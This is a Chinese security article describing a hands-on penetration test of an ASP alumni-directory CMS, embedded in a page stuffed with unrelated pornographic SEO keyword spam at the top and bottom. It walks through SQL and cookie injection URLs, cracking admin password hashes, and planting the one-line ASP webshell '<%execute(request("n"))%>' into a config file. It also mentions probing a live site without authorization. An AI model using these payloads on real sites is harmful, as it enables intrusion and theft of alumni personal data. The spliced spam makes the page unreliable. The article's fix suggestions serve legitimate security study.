精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

不懂ASP也照樣挖漏洞 記一次CMS型校友錄的安全檢測

原創
安全 應用安全
經常接觸網站制作的業內人士都知道什么是CMS,由于這個成熟的內容管理系統框架具有良好的擴展性,因此也被大量作為企業網站,校友錄等使用。網上有很多開源或免費的CMS版本,但其安全性和穩定性卻并不盡如人意。

【51CTO.com 獨家特稿】幾乎每個公司或團體都會建立自己的網站,但由于各種原因,大部分人會使用網上 公 布的一些CMS來構建自己的網 站,但卻很少有人會關注自己使用的CMS是否安全。下面存在漏洞的校友錄就是一個 很好的例子,攻破后,校友的個人信息將全部泄露。


一、對某CMS的初步安檢

1.初步查看
某日,在安天365群里,同伴發過來一個網址,讓我友情檢測一下該網站的 安全,打開后感覺 人氣還不錯,界面也比較簡潔 。如圖1所示。

圖1

2.簡單的安全測試
打開網站一看原來是個校友錄,隨便找個帶參數的地方,加個單引 號,http://www.*********.com/gg.asp?id=100', 返回的 結果如圖2所示。

圖2

很明顯,程序做了防注入的處理,看來程序開發者還有點安全意識,做了一些安全措施,不過后來證明,防注 入也 只是檢測了GET方法,并 未對POST和COOKIE做檢測。正準備測試cookie注入,同伴kiss傳了個源代碼過來, 有源代碼就 好辦了,還是在本地測試安全,網上的畢竟是未 經授權的安全檢測,多少存在一些風險。
#p#
二、在本地進行安全測試

1.搭建測試環境
把校友錄的源代碼復制到IIS的web目錄下,打開瀏覽器瀏覽http://192.168.1.5/txl/,結果如圖3所示。

圖3

2.安裝組件
很顯示,我本地服務器不支持它的組件,先看說明。在安裝說明里有這么 一句“組件安裝方法 ,將 該組件復制到 C:\WINDOWS\system32里,并將此權限設置成允許網站訪問組的“完全 控制權限”。例:將 everyone設置 成“完全控制”。然后在“開始/運行 ”中輸入‘regsvr32 yvsy.dll’,卸 載方式為‘regsvr32 yvsy.dll -u’”。照 著它的方法注冊了組件,如圖4所示。

圖4

3.搭建試驗環境成功
注冊成功后,再次瀏覽http://192.168.1.5/txl/,一切正常了,后面 開始檢測該CMS的安全漏 洞。如圖5所示。

圖5


#p#
三、挖掘并查找安全漏洞

1.解密CMS源代碼
使用Editplus編輯器打開CMS下的源代碼,發現程序作者對部分源代 碼使用了Encoder加密,如圖6所示。

圖6

2.解密源代碼
為了方便查看源代碼,首先對它們進行解密,到網上下載asp腳本解密工 具,打開,選擇源代碼所 在目錄,如圖7所示。

圖7

點擊“開始解密”,幾秒鐘后就可以對文件夾下所有asp文件解密。解密后的代碼如圖8所示。

圖8

說明:
(1)其實,使用Encoder對asp腳本加密沒什么必要,因為對于asp腳本解密太簡單了,于其花時間 在加密 腳本上,不如將時間花在寫更安全的代碼上。

(2)什么是Encoder加密?
Asp Encoder是微軟推出的一套算法,并提供了一個命令行下的腳本加密工具 。 Script Encoder的特點是:它只加密頁面中嵌入的腳本代碼,其他部分,如HTML的TAG仍然保持原樣不變。處 理后的文件 中被加密過的部分為只讀內容,對加密部分的任何修改都將導致 整個加密后的文件不能使用。 Script Encoder加密過的 ASP文件還將使Script Debugger之類的腳本調試工具失效。

3.查找SQL注入點
因為代碼還挺多的,不想一個個看,所以通過正則表達式來查找可能 存在注入的文件,之后再 慢慢看。打開EditPlus,點擊“搜索”->“在文件中查找”,彈出的對話框,查找內 容填寫 “((select|update|delete)+.*(from|set)+.*(where)+.*)”,文件類型填寫“*.asp”,文件夾選擇校 友錄所在的文件 夾,再把“包含了文件夾”和“正則表達式”選項選上,如圖9所示。

圖9

此正則表達式的意思是查找文件夾下所有的asp文件,如果包含select、update和delete這些SQL語句,就顯示 出來。 只花了一秒鐘,結果出來了,有68個文件使用到SQL語句,如圖10所示。

圖10

圖10 查詢結果

說明:
在編寫處理字符串的程序或網頁時,經常會有查找符合某些復雜規 則的字 符串的需要。正則表達式就是用于描述這些規則的工具。換句話說,正則表達式就是記錄文本規則的代碼 。很可能你使 用過Windows/Dos下用于文件查找的通配符(wildcard),也就是*和?。如果你想查找某個目錄下的 所有的Word文檔的話, 你會搜索*.doc。在這里,*會被解釋成任意的字符串。和通配符類似,正則表達式也是用 來進行文本匹配的工具,只不 過比起通配符,它能更精確地描述你的需求——當然,代價就是更復雜——比如你 可以編寫一個正則表達式,用來查找 所有以0開頭,后面跟著2-3個數字,然后是一個連字號“-”,最后是7或8 位數字的字符串(像010-12345678或0376- 7654321)。

4.初審代碼

(1)查看app.asp文件源代碼
在查詢結果中先查看app.asp文件,如圖11所示。

圖11

第二行bid=clng(request("bid"))把bid的值轉為Long子類型,如果request的值不為數字,則會出現錯誤。如 圖12所 示。CLng 函數可返回表達式,此表達式已被轉換為 Long 子類型的 Variant。

圖12

注意:值的范圍必須是在-2147483648 和 2147483647之間。

(2)分析bbsadd.asp文件
于是繼續分析下一個文件,bbsadd.asp文件,第406-409行:

406 < %repquote=request("repquote")

407 if repquote<>"" then

408 rs.open "select userid,cantent from [bbs] where id="&repquote&"",conn,1,1

409 reContent=obj.GetReContent(rs("cantent"))

很明顯,repquote參數未做任何過濾,直接放入SQL語句中,造成SQL注入。分析此文件得知,當引用別人的帖子 回復時,觸發此 SQL注入。先瀏覽一下http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply&repquote=2,返回正常,如圖13所示。

圖13

再加個單引號http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply&repquote=2'返回圖2一樣防注入的頁面,我在源代碼中一直找不到 防注的 代碼,應該是存在它的組件中??此茮]有辦法注入了,但我們還有POST和COOKIE注入沒有試,先試POST方 法,直 接把URL 放到pangolin里,選擇POST,在高級選項里讀取cookie,點檢測,一會,結果就出來了,如圖14 所示。

圖14

pangolin別看它是英文界面,它可是國人ZwelL寫的一款Windows平臺下的自動化SQL注入滲透測試工具。他實 現了 從檢測到利用完成一體化的滲透攻擊動作,盡可能的將攻擊效果最大化。

(3)測試COOKIE注入
再測試COOKIE注入,先依次在瀏覽器地址欄輸入:
http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply&repquote=2 正常
javascript:alert (document.cookie="repquote="+escape("2 and 1=1"));
http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply 正常
javascript:alert(document.cookie="repquote="+escape("2 and 1=2"));
http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply 不正常,如圖15所示。

圖15

修補建議:把406行改為repquote =obj.regstr(request.form("repquote"))

小知識:什么是POST注入和COOKIE注入?
通常http請求不外乎 GET和POST兩種方法,也就是說如果服務端 要從客 戶端獲取參數值的話,一般是使用Request.QueryString("name")或者Request.Form("name")方法,也可 以合成 Request ("name"),一般防注入程序只是對這兩種方法提交的值作了過濾,而忽視了另外一種方法,那就 是 Request.Cookie ("name"),所以造成了COOKIE注入。

(3)繼續分析源代碼

繼續一個個文件進行分析,其它文件沒發現什么問題,一直來到登錄文件login.asp。看28-35行:

28 if request ("submi")=1 then
29 if comeurl="" Then ShowError("請在頁面里登錄")
30 xyluser=request.form ("xyluser")
31 xylpwd=md5(request.form("xylpwd"))
32 if xyluser="" or xylpwd="" Then ShowError("用 戶名和密碼不可以為空")
33 rs.open "select id,password,lastdate,logins,lastip,sitejob,sitemoney,isclose from user where 

username='"&xyluser&"'",conn,1,3
34 If Rs.eof and Rs.bof Then ShowError("你的用 戶名不存在")
35 if rs("password")<>xylpwd Then ShowError("你的密碼錯誤")
在第30行,xyluser變 量未過慮,直接放入SQL語句中,造成注入。但卻不能 使用POST直接注入,看第29行,如果HTTPREFERER參數為空,就會提示“請在頁面里登錄”,直接提交
http://192.168.1.4/txl/login.asp?xylpwd=m3m3.com&CkiExp=31&submi=1&loginsubmit=%BB%E1%D4%B1% B5%C7%C2%BC&xyluser=n3tl04d。如圖16所示。

圖16

雖然不能使用POST直接注入,但可以通過一個php腳本來轉發數據包來注入,中轉腳本如下:
dddddddddddddd
ddddddddd
把此腳本放在一個支持CRUL的PHP空間上,同時還要magic_quotes_gpc = off, 如果magic_quotes_gpc = on,輸入的單引號會被轉義為“\'”,然后瀏覽http://www.n3tl04d.mil/post4.php?id=n3tl04d,如圖17所示。

圖17

http://www.n3tl04d.mil/post4.php? id=n3tl04d放到Pangolin注入,如圖18所示。

圖18

修補建議:把第30行改為xyluser =obj.regstr(request.form("xyluser"))

(4)分析后臺文件adminbj.asp文件

分析后臺文件adminbj.asp文件,先看代碼
10 <%ad=request("ad")
11 type2=request("type2")
12 bjid=request("bjid")
13 Select Case type2
14 Case "edit":
……(略去無關代碼)
101 sub edit
102 sql="select * from bj where id="&bjid&""
103 rs.open sql,conn,1,1%>
很明顯,未對傳入參數bjid的值未做任何過濾,直接放 入 SQL語句中,

http://192.168.1.4/txl/admin/adminbj.asp?type2=edit&bjid=1,又是一個 注入, 但只能POST或COOKIE

注入,不過此此注入算是雞肋的注入,因為要登錄才能注入,沒什么實際意義。同樣的注入出現在后臺多個文 件了, 這里就不一一寫出來了。
#p#
四、后臺拿shell

1.猜解后臺密碼
后臺登錄有兩個密碼,這兩個密碼都存在admin表中,所以猜解admin 的表段時,需要手動添加 password2

第二個密碼的表段,使用pangolin猜解,等一會,兩個密碼都猜出來了,如圖19所示。

圖19

2.破解密碼并登錄后臺
把d42683b3df678c61和c39059a89ab77d84拿到www.cmd5.com去解密,密碼分別是admin1和admin2。拿去登錄后臺,成功。 如圖20所示。

圖20

這里不太明白,為什么開發者使用兩個登錄密碼,而兩個密碼放在同一表里,這里對安全性并沒有太大的提高 。應該把第二個密碼使用其它加密方式單獨寫入一個asp文件中,這樣安全性不是有更大的提高?

3.插入一句話后門
查看一下siteinfo.asp文件,此文件是網站的一些信息配置文件,而后臺 admin/siteinfo.asp對此配置文件編輯時,并不會對表單的值進行過濾,就給攻擊者在配置文件寫入一句話木馬 的機會。在管理后臺,點擊站點參數,在網址欄輸入:<%execute(request ("n"))%><%'/">http://"%><%execute(request("n"))%><%',如圖21所示。

圖21

4.使用Lanker的Webshell連接后臺
使用lanker微型PHP+ASP管理器1.0雙用版連接http://192.168.1.4/txl/siteinfo.asp,如圖22所示,成 功獲得Webshell,之后可以上傳大馬,做進一步提權滲透測試。

圖22

說明:
此方法會造成網站無法正常瀏覽,在上傳大馬后,應及時恢復原配置文件siteinfo.asp。
#p#
五、直接拿webshell

本來這是在最前面測試的,但由于各種原因,我把它放最后。數據庫是以asp文件存在,如果使用者沒更改默 認數據庫文件,那么就在可以輸入的地方往數據庫內插入一句話木馬,直接得到webshell。于是查找所有文件中 包含“request.form”的文件,最后在note.asp文件中發現,程序未對客戶輸入的內容做任何過濾,可以把一句 話木馬直接插入數據庫內。

if request("type2")="add" then
rs.open "select * from note1 where userid="&session("xyluserid")&"",conn,1,3
If Rs.eof Then
rs.addnew
response.write "添加成功"
rs("userid")=session ("xyluserid")
end if
rs("content")=request.form("content") 
rs.update
rs.close
response.write "修改成功"
end if
于是嘗試在往 數據庫中插入:“%><%execute request("n")%><%”“%><%execute request ("n")%>”等 多種一句話的Unicode字符,再訪問數據庫文件,都顯示,無法閉合,如圖23所示。

圖23

原因是數據庫中存在nodown表,做了防下載處理,不過應該可以突破,但本人能力有限,未能進一步突破。

安全小知識:如何建立nodown防下載表?
首先,用notepad新建一個內容為“<%”的文本文件,隨便起 個名字存檔。
接著,用Access打開您的數據庫文件,在最后新建一個表,隨便起個名字,在表中添加一個OLE 對象的字段,然后添加一個記錄,插入之前建立的文本文件,如果操作正確的話,應該可以看到一個新的名為“ 數據包”的記錄。
#p#
六、總結

由于本人不懂ASP,能力有限,所以此次檢測并沒有太深入,還有一些XSS跨站攻擊和上傳等也未進行測試,總 體來說,這套CMS的安全性還是可以的,如果管理員密碼設置復雜一些,登錄不了后臺,那也無法拿到webshell。 個人認為在選擇CMS時,選擇一些成熟的CMS產品安全性會高些,同時也應該把數據庫文件和配置文件的名稱改復 雜一些。

【51CTO.COM 獨家特稿,轉載請注明出處及作者!】

【編輯推薦】

  1. 對某戶外旅游網站的一次安全檢測
  2. 對某高級技工學校網站的安全檢測和加 固
  3. 對韓國某手表網站的一次偶然安全檢測
責任編輯:王文文 來源: 51CTO.com
相關推薦

2021-11-11 16:14:04

Kubernetes

2011-09-27 10:35:44

2014-08-06 11:24:24

Elasticsear劫持掛馬

2013-01-17 10:31:13

JavaScriptWeb開發firebug

2021-05-13 08:51:20

GC問題排查

2011-02-22 09:29:23

jQueryJavaScript

2021-12-20 10:15:16

zip密碼命令網絡安全

2019-03-15 16:20:45

MySQL死鎖排查命令

2013-04-01 10:27:37

程序員失業

2023-06-07 07:31:04

PC端app脫殼技巧

2021-02-25 10:00:19

企業安全互聯網云平臺安全

2009-01-06 15:20:01

2024-06-04 10:54:34

.NET代碼程序

2020-12-29 10:25:07

漏洞JSONP注入

2012-09-03 14:22:02

2023-04-06 07:53:56

Redis連接問題K8s

2017-07-07 16:07:41

2014-08-11 09:31:52

2022-01-07 11:48:59

RabbitMQGolang 項目

2020-08-24 07:34:39

網絡超時請求
點贊
收藏

51CTO技術棧公眾號

成人国产精品色哟哟| 亚洲日本aⅴ片在线观看香蕉| 欧美激情精品久久久久久久变态 | 欧美精品成人在线| 逼特逼视频在线观看| 欧美办公室脚交xxxx| 亚洲国产精品成人综合色在线婷婷 | 精品久久久精品| 日韩欧美在线观看强乱免费| av网站免费大全| 亚洲欧美久久久| 久久深夜福利免费观看| asian性开放少妇pics| 精品裸体bbb| 一区二区三区精品视频在线| 日产国产精品精品a∨| 国产强被迫伦姧在线观看无码| 精品久久影视| 精品久久人人做人人爰| 国产又大又黄又粗的视频| 欧美videosex性欧美黑吊| 国产日韩一级二级三级| 动漫精品视频| 国产又粗又猛又爽| 美女网站久久| 国模吧一区二区| 美女视频久久久| 国产精品欧美在线观看| 欧美mv日韩mv亚洲| 在线看免费毛片| 成人做爰视频www网站小优视频| 91视频免费观看| 91精品天堂| 一级片在线免费观看视频| 亚洲区第一页| 欧美大片在线影院| 日韩在线中文字幕视频| 日韩美女一区二区三区在线观看| 91.com在线观看| 性生交免费视频| xxxxxx欧美| 懂色av中文一区二区三区天美| 精品麻豆av| 国产精品久久久久久久成人午夜| 欧美在线二区| 日韩亚洲欧美中文在线| 99精品欧美一区二区| 少妇精品久久久| 日韩精品免费视频| 亚洲综合自拍网| 久久国产精品免费精品3p| 欧美电影免费观看完整版| 老司机av网站| 白白在线精品| 精品福利av导航| 日本一级片在线播放| 日韩高清影视在线观看| 日韩精品久久久久久福利| 韩国无码一区二区三区精品| 日韩影视高清在线观看| 精品亚洲男同gayvideo网站| 女同毛片一区二区三区| 亚洲盗摄视频| 一本色道久久88综合日韩精品| 精品国产午夜福利在线观看| 国产亚洲亚洲国产一二区| 91精品国产福利| 涩多多在线观看| 97久久精品| 日韩av在线导航| 成年人网站免费在线观看| 国产传媒欧美日韩成人精品大片| 欧美mv和日韩mv的网站| www.啪啪.com| 曰本一区二区三区视频| 日韩中文在线视频| 欧美做爰爽爽爽爽爽爽| 在线欧美三区| 日本欧美一二三区| 国产精品久久久久久久久久久久久久久久| 亚洲一区黄色| 国产黑人绿帽在线第一区| 亚洲最新av网站| 国产一区二区三区久久久| 成人午夜电影免费在线观看| 日韩a级作爱片一二三区免费观看| 国产成人在线观看免费网站| 国产v亚洲v天堂无码| 青梅竹马是消防员在线| 国产精品美女久久久久久久久| 快播亚洲色图| 欧美三级黄网| 亚洲成国产人片在线观看| 熟女性饥渴一区二区三区| 日韩毛片网站| 亚洲精品电影网站| 美国一级片在线观看| 激情视频一区| 国产在线观看91精品一区| 丁香六月天婷婷| 国产精品青草久久| 日本免费a视频| 小明成人免费视频一区| 亚洲精品一区二区三区影院| 人妻互换一区二区激情偷拍| 在线高清一区| 国产综合久久久久久| 天堂在线视频免费观看| 亚洲色图都市小说| 日韩免费高清在线| 国产伦精品一区二区三区在线播放| 日韩色在线观看| 成人国产精品久久久网站| 欧美成熟视频| 国产精品jvid在线观看蜜臀 | 亚洲精品女人| 成人国内精品久久久久一区| 玖玖综合伊人| 欧美日韩国产限制| www.com日本| 亚洲精品午夜av福利久久蜜桃| 久久视频免费观看| 日韩电影在线观看一区二区| 成人av一区二区三区| 老汉色影院首页| 日韩一级特黄| 中文字幕最新精品| 伊人久久中文字幕| www国产亚洲精品久久麻豆| 性高湖久久久久久久久aaaaa| 免费高潮视频95在线观看网站| 狠狠色狠色综合曰曰| 国产人妻精品久久久久野外| 国产精品久久久久一区二区三区厕所 | 精品人妻互换一区二区三区| 欧美黄色一区二区| 91精品在线一区| 日韩黄色影院| 欧美精品99久久久**| 影音先锋男人在线| 奇米777欧美一区二区| 欧美日韩一区二区三区免费| 日韩av一卡| 国产视频精品免费播放| 999这里只有精品| 久久亚洲捆绑美女| 成年人免费在线播放| 天堂资源在线亚洲| 日本sm极度另类视频| 五月激情丁香婷婷| 欧美日韩视频免费播放| 偷拍女澡堂一区二区三区| 亚洲激情偷拍| 你懂的网址一区二区三区| 亚洲精品动漫| 一区二区三区视频免费在线观看| 99热精品免费| 国产不卡一区视频| 日韩免费视频播放| 国产精品片aa在线观看| 国产精品999999| 精品麻豆一区二区三区| 日韩欧美一区二区免费| 国产无遮挡免费视频| 99精品视频在线播放观看| 亚洲 高清 成人 动漫| 久久超碰99| 国产精品自拍网| 18加网站在线| 亚洲国产精品久久久久秋霞蜜臀| 国产美女高潮视频| 国产激情一区二区三区桃花岛亚洲| 日韩国产欧美一区| www一区二区三区| 欧美男插女视频| 日本私人网站在线观看| 色素色在线综合| 二区三区四区视频| 成人免费视频一区二区| 国产熟女高潮视频| 欧美3p在线观看| 国产精品v欧美精品v日韩| 成人动漫一区| 久久av.com| 青青草免费观看免费视频在线| 午夜国产精品影院在线观看| 青青草福利视频| 国产一区欧美一区| 国产91在线视频观看| 色呦哟—国产精品| 国产精品久久久对白| 久久野战av| 久久99精品国产99久久6尤物| 99久久精品国产一区二区成人| 国产性天天综合网| 韩国三级在线播放| 日韩精品免费专区| 91九色国产ts另类人妖| 尤物tv在线精品| 99久久综合狠狠综合久久止| 国产亚洲一区二区手机在线观看| 亚洲人a成www在线影院| www.五月天激情| 欧美在线一区二区| 久久久精品视频在线| 中日韩av电影| 亚洲综合自拍网| 丰满少妇久久久久久久| 五月天中文字幕在线| 视频在线在亚洲| 成人午夜精品久久久久久久蜜臀| 免费萌白酱国产一区二区三区| 久久久视频在线| 91xxx在线观看| 精品无人区太爽高潮在线播放 | 日韩欧美激情在线| 日韩精选在线观看| 欧美午夜精品在线| 国产一级一片免费播放放a| √…a在线天堂一区| 欧美 日韩 成人| 久久综合久久鬼色中文字| 911亚洲精选| 精品一二线国产| 天堂网在线免费观看| 老牛国产精品一区的观看方式| 亚洲国产精品久久久久婷婷老年| 欧美成人xxxx| 国产精品久久一区主播| 亚洲精品动漫| 日本不卡免费高清视频| 大菠萝精品导航| 久久全球大尺度高清视频| 中文字幕有码在线视频| 在线精品高清中文字幕| 精品无吗乱吗av国产爱色| 亚洲精品国产精品国自产观看浪潮 | 日韩在线资源| 在线成人激情黄色| www.av在线播放| 夜夜嗨av色一区二区不卡| 精品无人乱码| 亚洲色图15p| 精华区一区二区三区| 精品一区二区三区电影| 青青草在线视频免费观看| 亚洲女人被黑人巨大进入| 欧洲成人av| 亚洲性av在线| 91在线导航| 久久九九亚洲综合| av在线free| 欧美黄网免费在线观看| 超碰97免费在线| 2018国产精品视频| 欧美大胆性生话| 国产精品精品一区二区三区午夜版| 成人video亚洲精品| 久久99久国产精品黄毛片入口| 日韩欧美电影在线观看| 亚洲另类欧美自拍| 不卡在线视频| 欧美插天视频在线播放| 波多野结衣精品| 国产成人精品一区二区| 高清av一区| 51精品国产人成在线观看| 国产乱人伦丫前精品视频| 欧美日韩亚洲免费| 久久中文字幕av| 日韩五码在线观看| 日韩和欧美一区二区| 捷克做爰xxxⅹ性视频| 成人免费视频网站在线观看| bl动漫在线观看| 日本一区二区三区免费乱视频| 国产精品探花一区二区在线观看| 国产乱码精品1区2区3区| 精人妻一区二区三区| 9色porny自拍视频一区二区| 免费视频91蜜桃| 一二三四社区欧美黄| 无码人妻精品一区二区三区不卡| 亚洲大尺度视频在线观看| 亚洲av中文无码乱人伦在线视色| 亚洲一区二区av在线| 欧美精品韩国精品| 51午夜精品国产| 日本天堂在线| 精品国产欧美一区二区五十路| 国产青青草在线| 欧美另类在线播放| 粉嫩一区二区三区| 国产精品播放| 日韩专区精品| 草草久久久无码国产专区| 蜜臀av性久久久久av蜜臀妖精| 亚洲成人福利在线观看| 国产福利一区二区三区视频| 欧美亚一区二区三区| 一区二区三区四区在线| 无码人妻aⅴ一区二区三区有奶水| 色呦呦一区二区三区| aa视频在线免费观看| 一本久久综合亚洲鲁鲁| 麻豆蜜桃在线观看| 亚洲va欧美va国产综合剧情| 久久av资源| 全黄性性激高免费视频| 国产真实精品久久二三区| 爱爱的免费视频| 亚洲一二三区不卡| 国产男女裸体做爰爽爽| 在线看日韩欧美| 国产直播在线| 草莓视频一区| 99久久.com| 91看片在线免费观看| 91片在线免费观看| 亚洲激情视频一区| 日韩一区二区电影| 麻豆视频在线观看免费| 国产精品极品美女在线观看免费| 国产 日韩 欧美| 亚洲国产精品久久久久婷婷老年| 婷婷亚洲五月色综合| 高清一区在线观看| 久久精品欧美一区二区三区麻豆| 日本综合在线观看| 色婷婷久久综合| 日本黄在线观看| 欧美最猛性xxxxx亚洲精品| 国产精品一线| 亚洲乱码日产精品bd在线观看| 国产日韩欧美三级| 一起草在线视频| 五月开心婷婷久久| 午夜视频在线播放| 88xx成人精品| 亚洲国产最新| 久久综合久久色| 国产无一区二区| 午夜精品免费观看| 亚洲午夜性刺激影院| 亚洲精品一区三区三区在线观看| 国产精品av电影| 国内成人精品| 国产又大又黄又猛| 国产精品伦一区| 国产人妻精品一区二区三| www.亚洲免费视频| 国产精品亚洲欧美日韩一区在线 | 国产精品爽爽久久| 宅男66日本亚洲欧美视频| www.国产精品| 日本精品免费视频| 成人免费视频播放| 99精品视频99| 在线视频欧美日韩精品| 日韩美香港a一级毛片| 视色,视色影院,视色影库,视色网 日韩精品福利片午夜免费观看 | 久久高清免费视频| 亚洲韩国日本中文字幕| 亚洲天堂免费电影| 亚洲精品永久www嫩草| 免费在线一区观看| 欧美黄色aaa| 亚洲激情国产精品| 欧美××××黑人××性爽 | 亚洲地区一二三色| 国产精品国产高清国产| 国产精品高清免费在线观看| 999精品色在线播放| 少妇伦子伦精品无吗| 日韩欧美国产成人| 欧美日韩在线看片| 国产伦精品一区二区三毛| 亚洲一区二区三区高清| 91精品久久久久久久久久久久| 亚洲影视在线播放| 欧美日韩在线精品一区二区三区激情综| xvideos成人免费中文版| 色悠久久久久综合先锋影音下载| 亚洲国产一区二区三区在线| 国产一区二区三区在线观看免费视频 | 免费黄色日本网站| 国产精品青草久久| 人妻精品一区二区三区| 国产精品极品美女粉嫩高清在线| 国内露脸中年夫妇交换精品| 久草福利视频在线| 亚洲最新在线观看| 欧美女同网站| 成人av影视在线| 日本va欧美va精品| 日韩成人免费在线视频| 精品国产一区二区三区久久久狼| 久久野战av| 五月丁香综合缴情六月小说| 综合精品久久久|